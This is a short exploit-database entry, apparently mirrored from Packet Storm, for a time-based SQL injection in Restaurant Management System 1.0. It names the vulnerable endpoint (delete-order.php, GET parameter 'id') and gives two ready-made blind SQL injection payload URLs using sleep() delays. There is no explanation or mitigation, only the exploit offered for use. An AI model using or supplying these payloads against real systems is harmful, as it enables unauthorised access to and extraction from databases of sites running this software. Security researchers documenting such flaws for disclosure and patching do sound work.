Share
## https://sploitus.com/exploit?id=PACKETSTORM:171776
# Exploit Title: Restaurant Management System 1.0 - SQL Injection  
# Date: 2023-03-20  
# Exploit Author: calfcrusher (calfcrusher@inventati.org)  
# Vendor Homepage: https://www.sourcecodester.com/users/lewa  
# Software Link:  
https://www.sourcecodester.com/php/11815/restaurant-management-system.html  
# Version: 1.0  
# Tested on: Apache 2.4.6, PHP 5.4.16  
  
Endpoint: /rms/delete-order.php  
  
Vulnerable parameter: id (GET)  
  
Time Base SQL Injection payloads  
  
http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23  
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--